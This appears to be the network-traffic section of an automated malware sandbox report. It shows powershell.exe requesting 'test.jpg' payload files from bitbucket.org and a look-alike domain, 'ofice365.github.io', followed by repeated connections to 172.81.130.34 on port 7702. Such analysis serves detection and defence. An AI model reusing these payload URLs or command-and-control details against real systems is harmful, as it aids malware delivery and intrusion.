                                                                                                                                      Feb 11, 2025 19:05:15.527183056 CET499887702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:15.527359962 CET499887702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:15.527760983 CET499897702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:15.532095909 CET770249988172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:15.532598972 CET770249989172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:15.533257008 CET499897702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:15.534742117 CET499897702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:15.539601088 CET770249989172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:15.539809942 CET499897702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:15.544625998 CET770249989172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:17.066210985 CET770249989172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:17.067859888 CET499897702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:17.067949057 CET499897702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:17.068311930 CET499907702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:17.072720051 CET770249989172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:17.073357105 CET770249990172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:17.073493958 CET499907702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:17.074759007 CET499907702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:17.079519033 CET770249990172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:17.079648972 CET499907702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:17.084424019 CET770249990172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:18.550595045 CET770249990172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:18.550724030 CET499907702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:18.555509090 CET499907702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:18.555881977 CET499917702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:18.560322046 CET770249990172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:18.560744047 CET770249991172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:18.560815096 CET499917702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:18.561789036 CET499917702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:18.566596985 CET770249991172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:18.566664934 CET499917702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:18.571501970 CET770249991172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:19.970699072 CET770249991172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:19.970767975 CET499917702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:19.971076965 CET499917702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:19.971523046 CET499927702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:19.975914001 CET770249991172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:19.976366997 CET770249992172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:19.976433039 CET499927702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:19.978087902 CET499927702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:19.982949018 CET770249992172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:19.983098984 CET499927702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:19.987931013 CET770249992172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:21.381824017 CET770249992172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:21.381925106 CET499927702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:21.382093906 CET499927702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:21.382447958 CET499937702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:21.386881113 CET770249992172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:21.387259960 CET770249993172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:21.387362003 CET499937702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:21.388854027 CET499937702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:21.393618107 CET770249993172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:21.393696070 CET499937702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:21.398471117 CET770249993172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:22.831746101 CET770249993172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:22.831826925 CET499937702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:22.832091093 CET499937702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:22.832510948 CET499947702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:22.836865902 CET770249993172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:22.837430954 CET770249994172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:22.837539911 CET499947702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:22.910814047 CET499947702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:22.915627003 CET770249994172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:22.915914059 CET499947702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:22.920721054 CET770249994172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:24.271167040 CET770249994172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:24.271250963 CET499947702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:24.271384954 CET499947702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:24.271697998 CET499957702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:24.276145935 CET770249994172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:24.276505947 CET770249995172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:24.276613951 CET499957702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:24.278383017 CET499957702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:24.283123016 CET770249995172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:24.283174038 CET499957702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:24.287911892 CET770249995172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:25.802987099 CET770249995172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:25.803122044 CET499957702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:25.803308010 CET499957702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:25.803673983 CET499967702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:25.808059931 CET770249995172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:25.808413029 CET770249996172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:25.808619022 CET499967702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:25.809648037 CET499967702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:25.814436913 CET770249996172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:25.814605951 CET499967702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:25.819431067 CET770249996172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:27.253007889 CET770249996172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:27.254132032 CET499967702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:27.254262924 CET499967702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:27.258033991 CET499977702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:27.259152889 CET770249996172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:27.262928963 CET770249997172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:27.263154984 CET499977702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:27.264230967 CET499977702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:27.269076109 CET770249997172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:27.269279003 CET499977702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:27.274080992 CET770249997172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:31.161915064 CET770249997172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:31.162055969 CET499977702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:31.162312984 CET499977702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:31.162467003 CET499987702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:31.167604923 CET770249997172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:31.167721987 CET770249998172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:31.167856932 CET499987702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:31.169003010 CET499987702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:31.174124956 CET770249998172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:31.174191952 CET499987702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:31.179543972 CET770249998172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:35.759835958 CET499987702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:35.764648914 CET770249998172.81.130.34192.168.2.7
                                                                                                                                      Feb 11, 2025 19:05:35.764714003 CET499987702192.168.2.7172.81.130.34
                                                                                                                                      Feb 11, 2025 19:05:35.769511938 CET770249998172.81.130.34192.168.2.7

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Feb 11, 2025 19:03:25.321427107 CET5475353192.168.2.71.1.1.1
                                                                                                                                      Feb 11, 2025 19:03:25.328263998 CET53547531.1.1.1192.168.2.7
                                                                                                                                      Feb 11, 2025 19:03:26.688956976 CET5359853192.168.2.71.1.1.1
                                                                                                                                      Feb 11, 2025 19:03:26.698364019 CET53535981.1.1.1192.168.2.7
                                                                                                                                      Feb 11, 2025 19:03:39.247771978 CET5351653192.168.2.71.1.1.1
                                                                                                                                      Feb 11, 2025 19:03:39.254977942 CET53535161.1.1.1192.168.2.7
                                                                                                                                      Feb 11, 2025 19:03:53.716609001 CET6099253192.168.2.71.1.1.1
                                                                                                                                      Feb 11, 2025 19:03:53.723207951 CET53609921.1.1.1192.168.2.7

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Feb 11, 2025 19:03:25.321427107 CET192.168.2.71.1.1.10xf86eStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:26.688956976 CET192.168.2.71.1.1.10x85dfStandard query (0)ofice365.github.ioA (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:39.247771978 CET192.168.2.71.1.1.10xf66cStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:53.716609001 CET192.168.2.71.1.1.10xf760Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Feb 11, 2025 19:03:25.328263998 CET1.1.1.1192.168.2.70xf86eNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:25.328263998 CET1.1.1.1192.168.2.70xf86eNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:25.328263998 CET1.1.1.1192.168.2.70xf86eNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:26.698364019 CET1.1.1.1192.168.2.70x85dfNo error (0)ofice365.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:26.698364019 CET1.1.1.1192.168.2.70x85dfNo error (0)ofice365.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:26.698364019 CET1.1.1.1192.168.2.70x85dfNo error (0)ofice365.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:26.698364019 CET1.1.1.1192.168.2.70x85dfNo error (0)ofice365.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:39.254977942 CET1.1.1.1192.168.2.70xf66cNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:39.254977942 CET1.1.1.1192.168.2.70xf66cNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:39.254977942 CET1.1.1.1192.168.2.70xf66cNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:39.254977942 CET1.1.1.1192.168.2.70xf66cNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:53.723207951 CET1.1.1.1192.168.2.70xf760No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:53.723207951 CET1.1.1.1192.168.2.70xf760No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:53.723207951 CET1.1.1.1192.168.2.70xf760No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                      Feb 11, 2025 19:03:53.723207951 CET1.1.1.1192.168.2.70xf760No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • bitbucket.org
                                                                                                                                      • ofice365.github.io
                                                                                                                                      • raw.githubusercontent.com

                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.749700185.166.143.504437844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2025-02-11 18:03:26 UTC112OUTGET /ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113 HTTP/1.1
                                                                                                                                      Host: bitbucket.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2025-02-11 18:03:26 UTC5103INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Tue, 11 Feb 2025 18:03:26 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Content-Length: 15184
                                                                                                                                      Server: AtlassianEdge
                                                                                                                                      Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding
                                                                                                                                      X-Used-Mesh: False
                                                                                                                                      Content-Language: en
                                                                                                                                      X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                      Etag: "005ea47b4a3697fb6cc8fe1e26350ff1"
                                                                                                                                      X-Dc-Location: Micros-3
                                                                                                                                      X-Served-By: e803c49e18dc
                                                                                                                                      X-Version: bd59e0614108
                                                                                                                                      X-Static-Version: bd59e0614108
                                                                                                                                      X-Request-Count: 2133
                                                                                                                                      X-Render-Time: 0.0694434642791748
                                                                                                                                      X-B3-Traceid: 8625f0670e484c97bf6c8df4c06d7604
                                                                                                                                      X-B3-Spanid: f91191a9b97bc9a9
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6291417196199936.storage.googleapis.com https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ 'nonce-OCrzoy+ppDYxEMFGOn0Fuw=='; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.i [TRUNCATED]
                                                                                                                                      X-Usage-Quota-Remaining: 998860.043
                                                                                                                                      X-Usage-Request-Cost: 1160.13
                                                                                                                                      X-Usage-User-Time: 0.027340
                                                                                                                                      X-Usage-System-Time: 0.007464
                                                                                                                                      X-Usage-Input-Ops: 0
                                                                                                                                      X-Usage-Output-Ops: 0
                                                                                                                                      Cache-Control: max-age=900
                                                                                                                                      Age: 0
                                                                                                                                      X-Cache: MISS
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                                                      Atl-Traceid: 8625f0670e484c97bf6c8df4c06d7604
                                                                                                                                      Atl-Request-Id: 8625f067-0e48-4c97-bf6c-8df4c06d7604
                                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                      Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                      Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                      Server-Timing: atl-edge;dur=175,atl-edge-internal;dur=4,atl-edge-upstream;dur=173,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                      Connection: close
                                                                                                                                      2025-02-11 18:03:26 UTC11281INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 69 64 3d 22 62 62 2d 62 6f 6f 74 73 74 72 61 70 22 20 64 61 74 61 2d 63 75 72 72 65 6e 74 2d 75 73 65 72 3d 22 7b 26 71 75 6f 74 3b 69 73 41 75 74 68 65 6e 74 69 63 61 74 65 64 26 71 75 6f 74 3b 3a 20 66 61 6c 73 65 2c 20 26 71 75 6f 74 3b 69 73 4b 62 64 53 68 6f 72 74 63 75 74 73 45 6e 61 62 6c 65 64 26 71 75 6f 74 3b 3a 20 74 72 75 65 2c 20 26 71 75 6f 74 3b 69 73 53 73 68 45 6e 61 62 6c 65 64 26 71 75 6f 74 3b 3a 20 66 61 6c 73 65 7d 22 0a 0a 20 2f 3e 0a 20 20 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4f 43 72 7a 6f 79 2b 70 70 44 59 78 45 4d 46 47 4f 6e 30 46 75 77 3d 3d 22 3e 0a 0a 69 66 20 28 77 69 6e 64
                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta id="bb-bootstrap" data-current-user="{&quot;isAuthenticated&quot;: false, &quot;isKbdShortcutsEnabled&quot;: true, &quot;isSshEnabled&quot;: false}" /> <script nonce="OCrzoy+ppDYxEMFGOn0Fuw==">if (wind
                                                                                                                                      2025-02-11 18:03:26 UTC3903INData Raw: 3e 0a 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 65 6d 6f 6a 69 22 20 73 72 63 3d 22 5b 5b 73 72 63 5d 5d 22 3e 0a 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6e 61 6d 65 20 65 6d 6f 6a 69 2d 72 65 73 75 6c 74 2d 2d 6e 61 6d 65 22 3e 5b 5b 26 6e 61 6d 65 5d 5d 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 0a 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 0a 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 69 64 3d 22 73 63 6f 70 65 2d 6c 69 73 74 2d 74 65 6d 70 6c 61 74 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 73 63 6f 70 65 2d 6c 69 73 74 22 3e 0a 20 20 5b 5b 23 73 63 6f 70 65 73 5d 5d 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22
                                                                                                                                      Data Ascii: > <img class="emoji" src="[[src]]"> </span> <span class="name emoji-result--name">[[&name]]</span></span> </script> <script id="scope-list-template" type="text/html"> <ul class="scope-list"> [[#scopes]] <li class="


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.749701185.199.110.1534437844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2025-02-11 18:03:27 UTC78OUTGET /1/test.jpg HTTP/1.1
                                                                                                                                      Host: ofice365.github.io
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2025-02-11 18:03:27 UTC725INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      Content-Length: 5747868
                                                                                                                                      Server: GitHub.com
                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                      permissions-policy: interest-cohort=()
                                                                                                                                      Last-Modified: Thu, 30 Jan 2025 07:59:39 GMT
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Strict-Transport-Security: max-age=31556952
                                                                                                                                      ETag: "679b316b-57b49c"
                                                                                                                                      expires: Tue, 11 Feb 2025 17:52:43 GMT
                                                                                                                                      Cache-Control: max-age=600
                                                                                                                                      x-proxy-cache: MISS
                                                                                                                                      X-GitHub-Request-Id: 7684:1BAB1B:1577FFB:180FE45:67AB8C13
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Age: 0
                                                                                                                                      Date: Tue, 11 Feb 2025 18:03:27 GMT
                                                                                                                                      Via: 1.1 varnish
                                                                                                                                      X-Served-By: cache-nyc-kteb1890029-NYC
                                                                                                                                      X-Cache: HIT
                                                                                                                                      X-Cache-Hits: 0
                                                                                                                                      X-Timer: S1739297007.275202,VS0,VE15
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      X-Fastly-Request-ID: fcbb2806324f2c240604c187996b0cfe724a513d
                                                                                                                                      2025-02-11 18:03:27 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 01 00 48 00 48 00 00 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64
                                                                                                                                      Data Ascii: JFIFHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@d
                                                                                                                                      2025-02-11 18:03:27 UTC16384INData Raw: eb 3c d1 e8 12 f2 75 69 52 e5 97 4e 66 84 b9 5a d2 25 44 d0 af 6c 97 2a 95 73 d8 71 9c fa f5 ed e3 f4 d9 d7 ce 5a 4d 67 3a ca 99 cb 78 da 53 5d 33 74 9c 5d 36 c7 d1 c9 d5 8d b6 a7 3b d3 8b 4d ae 78 e7 bb 1d e6 37 c7 3b 15 ad 63 33 75 2b 9d 22 27 0d a2 c4 dc d3 55 72 ac fa f5 ce bc cb f5 26 38 15 2e 9c f1 95 96 a7 6b c6 65 e9 c8 cc 26 ab 51 f5 73 56 34 dc e8 ba 54 6d cb ac 8d 67 53 71 26 d5 13 46 3b 55 cf 2f 49 a4 b1 1b cc 65 3d 31 ac 40 e9 7e 53 af ce db d5 e6 ec 32 52 eb 78 d1 b6 0e 4d 76 e5 d0 d0 ba cd 83 45 2b 8b d6 39 33 ec 55 c8 74 69 67 97 cd ed 3b 3c 2f 23 ed 39 b5 3e 12 7e d3 87 a6 3c 3e 9e ce 7a ea f4 be 76 73 af ab 3e 77 b3 37 d9 5c da 67 5b f4 72 e9 93 6a 97 a6 b1 59 ba de 34 ba d7 33 97 6b c2 a3 7a e1 d6 cd c9 72 d2 50 68 42 36 ce 82 27 46 99
                                                                                                                                      Data Ascii: <uiRNfZ%Dl*sqZMg:xS]3t]6;Mx7;c3u+"'Ur&8.ke&QsV4TmgSq&F;U/Ie=1@~S2RxMvE+93Utig;</#9>~<>zvs>w7\g[rjY43kzrPhB6'F
                                                                                                                                      2025-02-11 18:03:27 UTC16384INData Raw: cd 5e 8f 42 f9 31 ed 5c 78 7b 76 e3 ac 65 97 67 35 67 c9 dd 76 79 dd 3d 10 bd b5 c5 cf 9d 5f 91 3e 7f a3 9f 3e 93 3a c7 b5 e8 f8 bb 71 eb f5 b5 f3 bb 72 eb f4 13 e0 f5 66 fb 47 9e f1 ae ca e7 5a 9a 44 3d 73 7c 3e 82 3c fb d6 35 8c 54 3d 67 3e 1e 95 ab cb 9f 74 5c f3 bd fa 8e 2c 7b f0 5e 75 d6 58 fa f9 3a f1 a6 ae 0d f7 e2 db 1b df 60 e5 d9 72 f5 67 73 c9 bd ad f3 49 dc d1 37 29 9d 44 d7 56 77 ce 74 99 6b 0b 4c 09 7b a7 93 39 bf 4b 2e 38 ae fd bc dd 63 79 e5 69 d7 96 71 63 ca 6b 78 e9 ce 6a 1b e2 cf 4e b8 e3 d2 e7 b0 c1 e7 5a e9 cd 49 d7 a7 2d 67 5e 88 3e 3e 90 28 4d 30 54 84 d0 26 32 69 52 92 c3 29 dc 67 1b b6 43 b6 b3 1b 0b 86 ac 40 12 95 2d 25 e1 36 75 cf 3d 4b bb cb 59 51 45 b1 3a 34 e5 cf b9 5e 7c 77 b2 52 c7 35 39 b4 17 9b 35 15 28 e0 8d 1e 75 9d 52
                                                                                                                                      Data Ascii: ^B1\x{veg5gvy=_>>:qrfGZD=s|><5T=g>t\,{^uX:`rgsI7)DVwtkL{9K.8cyiqckxjNZI-g^>>(M0T&2iR)gC@-%6u=KYQE:4^|wR595(uR
